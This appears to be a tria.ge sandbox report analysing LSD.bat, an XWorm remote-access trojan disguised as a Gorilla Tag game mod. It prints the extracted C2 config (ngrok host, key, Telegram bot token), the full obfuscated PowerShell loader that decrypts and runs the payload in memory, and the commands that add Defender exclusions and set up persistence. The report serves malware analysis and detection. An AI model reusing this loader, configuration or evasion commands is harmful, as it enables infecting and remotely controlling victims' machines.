Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
10Static
static
1Project-LS...in.zip
windows7-x64
1Project-LS...in.zip
windows10-2004-x64
3Project-LS...ICENSE
windows7-x64
1Project-LS...ICENSE
windows10-2004-x64
1Project-LS...SD.zip
windows7-x64
1Project-LS...SD.zip
windows10-2004-x64
1LSD.bat
windows7-x64
8LSD.bat
windows10-2004-x64
10Project-LS...DME.md
windows7-x64
3Project-LS...DME.md
windows10-2004-x64
3Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
25/08/2024, 17:21
Static task
static1
Behavioral task
behavioral1
Sample
Project-LSD-Gorilla-Tag-main.zip
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
Project-LSD-Gorilla-Tag-main.zip
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
Project-LSD-Gorilla-Tag-main/LICENSE
Resource
win7-20240704-en
Behavioral task
behavioral4
Sample
Project-LSD-Gorilla-Tag-main/LICENSE
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
Project-LSD-Gorilla-Tag-main/LSD.zip
Resource
win7-20240705-en
Behavioral task
behavioral6
Sample
Project-LSD-Gorilla-Tag-main/LSD.zip
Resource
win10v2004-20240802-en
Behavioral task
behavioral7
Sample
LSD.bat
Resource
win7-20240705-en
Behavioral task
behavioral8
Sample
LSD.bat
Resource
win10v2004-20240802-en
Behavioral task
behavioral9
Sample
Project-LSD-Gorilla-Tag-main/README.md
Resource
win7-20240708-en
Behavioral task
behavioral10
Sample
Project-LSD-Gorilla-Tag-main/README.md
Resource
win10v2004-20240802-en
General
-
Target
LSD.bat
-
Size
1.3MB
-
MD5
a9550f1c944a4bce9df986467e8c8065
-
SHA1
da6c3d1e0b74a372f36b757917f0e9ddbd9ef4c3
-
SHA256
b7e0820ac8d4ca27a84814f33838a9892aaaec76f8837e791d6bad95e6259529
-
SHA512
fa76880904d49ac990a6b1172cf4aaa71c6119c17ed8c7bf31a9922433499ba3630d554273b49467ad59678d5d348deb8d7ce55b1120b4972941609566a732ca
-
SSDEEP
24576:IGaUv+Fjs045DPskYT2fBgr5ewKfgqVjS59G26wl9OM9g+l6xjSHWwu5:L9+yPf+VeYG2tI1QMW2z
Malware Config
Extracted
xworm
5.0
7.tcp.ngrok.io:22206
gZUzvp6k0Vw7befo
-
Install_directory
%AppData%
-
install_file
OneDrive.exe
-
telegram
https://api.telegram.org/bot6356371662:AAF4_y4uR4P5salxGzkxmxDwHJPbGvs4F18
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral8/memory/4576-34-0x00000184FE070000-0x00000184FE09A000-memory.dmp family_xworm -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 664 powershell.exe 3044 powershell.exe 880 powershell.exe 3684 powershell.exe 936 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation LSD.bat.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.lnk LSD.bat.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.lnk LSD.bat.exe -
Executes dropped EXE 1 IoCs
pid Process 4576 LSD.bat.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\Users\\Admin\\AppData\\Roaming\\OneDrive.exe" LSD.bat.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
flow ioc 44 7.tcp.ngrok.io 72 7.tcp.ngrok.io 92 7.tcp.ngrok.io 27 raw.githubusercontent.com 28 raw.githubusercontent.com -
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 18 api.ipify.org 19 api.ipify.org 32 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4920 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 15 IoCs
pid Process 664 powershell.exe 664 powershell.exe 4576 LSD.bat.exe 4576 LSD.bat.exe 3044 powershell.exe 3044 powershell.exe 880 powershell.exe 880 powershell.exe 3684 powershell.exe 3684 powershell.exe 936 powershell.exe 936 powershell.exe 936 powershell.exe 4576 LSD.bat.exe 4576 LSD.bat.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 664 powershell.exe Token: SeDebugPrivilege 4576 LSD.bat.exe Token: SeDebugPrivilege 3044 powershell.exe Token: SeDebugPrivilege 880 powershell.exe Token: SeDebugPrivilege 3684 powershell.exe Token: SeDebugPrivilege 936 powershell.exe Token: SeDebugPrivilege 4576 LSD.bat.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4576 LSD.bat.exe -
Suspicious use of WriteProcessMemory 26 IoCs
description pid Process procid_target PID 3012 wrote to memory of 4220 3012 cmd.exe 88 PID 3012 wrote to memory of 4220 3012 cmd.exe 88 PID 4220 wrote to memory of 4880 4220 net.exe 89 PID 4220 wrote to memory of 4880 4220 net.exe 89 PID 3012 wrote to memory of 4888 3012 cmd.exe 90 PID 3012 wrote to memory of 4888 3012 cmd.exe 90 PID 4888 wrote to memory of 2016 4888 cmd.exe 91 PID 4888 wrote to memory of 2016 4888 cmd.exe 91 PID 3012 wrote to memory of 4636 3012 cmd.exe 95 PID 3012 wrote to memory of 4636 3012 cmd.exe 95 PID 3012 wrote to memory of 1648 3012 cmd.exe 96 PID 3012 wrote to memory of 1648 3012 cmd.exe 96 PID 3012 wrote to memory of 664 3012 cmd.exe 97 PID 3012 wrote to memory of 664 3012 cmd.exe 97 PID 3012 wrote to memory of 4576 3012 cmd.exe 100 PID 3012 wrote to memory of 4576 3012 cmd.exe 100 PID 4576 wrote to memory of 3044 4576 LSD.bat.exe 102 PID 4576 wrote to memory of 3044 4576 LSD.bat.exe 102 PID 4576 wrote to memory of 880 4576 LSD.bat.exe 104 PID 4576 wrote to memory of 880 4576 LSD.bat.exe 104 PID 4576 wrote to memory of 3684 4576 LSD.bat.exe 106 PID 4576 wrote to memory of 3684 4576 LSD.bat.exe 106 PID 4576 wrote to memory of 936 4576 LSD.bat.exe 108 PID 4576 wrote to memory of 936 4576 LSD.bat.exe 108 PID 4576 wrote to memory of 4920 4576 LSD.bat.exe 112 PID 4576 wrote to memory of 4920 4576 LSD.bat.exe 112 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\LSD.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3012 -
C:\Windows\system32\net.exenet file2⤵
- Suspicious use of WriteProcessMemory
PID:4220 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file3⤵PID:4880
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org2⤵
- Suspicious use of WriteProcessMemory
PID:4888 -
C:\Windows\system32\curl.execurl -s https://api.ipify.org3⤵PID:2016
-
-
-
C:\Windows\system32\curl.execurl -s -o blacklist.txt https://raw.githubusercontent.com/ThunderboltDev/IP-BLACKLIST/main/blacklist_ips.txt2⤵PID:4636
-
-
C:\Windows\system32\findstr.exefindstr /C:"194.110.13.70" blacklist.txt2⤵PID:1648
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\\"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:664
-
-
C:\Users\Admin\AppData\Local\Temp\LSD.bat.exe"LSD.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $YZrPtiYD = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\LSD.bat').Split([Environment]::NewLine);foreach ($uDpKXGuz in $YZrPtiYD) { if ($uDpKXGuz.StartsWith(':: ')) { $TsoLQbVY = $uDpKXGuz.Substring(3); break; }; };$DLhtmrSl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($TsoLQbVY);$MmDnIeCf = New-Object System.Security.Cryptography.AesManaged;$MmDnIeCf.Mode = [System.Security.Cryptography.CipherMode]::CBC;$MmDnIeCf.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$MmDnIeCf.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3UJKza9U4IyboVW3XkY78xdElsdzOf0qDcphsexgwGg=');$MmDnIeCf.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IHByTY43CTggzzH1HZVtxA==');$DUzPrnIo = $MmDnIeCf.CreateDecryptor();$DLhtmrSl = $DUzPrnIo.TransformFinalBlock($DLhtmrSl, 0, $DLhtmrSl.Length);$DUzPrnIo.Dispose();$MmDnIeCf.Dispose();$jGyEbXKQ = New-Object System.IO.MemoryStream(, $DLhtmrSl);$HlKcPZxE = New-Object System.IO.MemoryStream;$foNXcIsL = New-Object System.IO.Compression.GZipStream($jGyEbXKQ, [IO.Compression.CompressionMode]::Decompress);$foNXcIsL.CopyTo($HlKcPZxE);$foNXcIsL.Dispose();$jGyEbXKQ.Dispose();$HlKcPZxE.Dispose();$DLhtmrSl = $HlKcPZxE.ToArray();$AMliJFTS = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($DLhtmrSl);$KtZnRMID = $AMliJFTS.EntryPoint;$KtZnRMID.Invoke($null, (, [string[]] ('')))2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4576 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\LSD.bat'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3044
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'LSD.bat.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:880
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\OneDrive.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3684
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:936
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "OneDrive" /tr "C:\Users\Admin\AppData\Roaming\OneDrive.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:4920
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
64B
MD5feadc4e1a70c13480ef147aca0c47bc0
SHA1d7a5084c93842a290b24dacec0cd3904c2266819
SHA2565b4f1fe7ba74b245b6368dbe4ceffa438f14eef08ba270e9a13c57505c7717ac
SHA512c9681a19c773891808fefa9445cea598d118c83bba89530a51ab993adbff39bce72b43f8e99d0c68e4a44f7e0f4c8ec128641c45cd557a8e1215721d5d992a23
-
Filesize
944B
MD596ff1ee586a153b4e7ce8661cabc0442
SHA1140d4ff1840cb40601489f3826954386af612136
SHA2560673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8
SHA5123404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569
-
Filesize
944B
MD596e3b86880fedd5afc001d108732a3e5
SHA18fc17b39d744a9590a6d5897012da5e6757439a3
SHA256c3077e4cadb4ed246c02abe55aa6cf832fee4c2546b7addb7d22cd1c7c8c1294
SHA512909b1968f7204fa7029109b02232d8cc5438f6b4dc7c9044e4e47c59fcee538199b13029e36592b12ed573d48a308dd4822d2ced4129ab08d4111897e02be55d
-
Filesize
944B
MD510890cda4b6eab618e926c4118ab0647
SHA11e1d63b73a0e6c7575f458b3c7917a9ce5ba776d
SHA25600f8a035324d39bd62e6dee5e1b480069015471c487ebee4479e6990ea9ddb14
SHA512a2ee84006c24a36f25e0bca0772430d64e3791f233da916aecdeae6712763e77d55bbbd00dc8f6b2b3887f3c26ab3980b96c5f46cc823e81e28abbbc5fc78221
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
14B
MD53be7b8b182ccd96e48989b4e57311193
SHA178fb38f212fa49029aff24c669a39648d9b4e68b
SHA256d5558cd419c8d46bdc958064cb97f963d1ea793866414c025906ec15033512ed
SHA512f3781cbb4e9e190df38c3fe7fa80ba69bf6f9dbafb158e0426dd4604f2f1ba794450679005a38d0f9f1dad0696e2f22b8b086b2d7d08a0f99bb4fd3b0f7ed5d8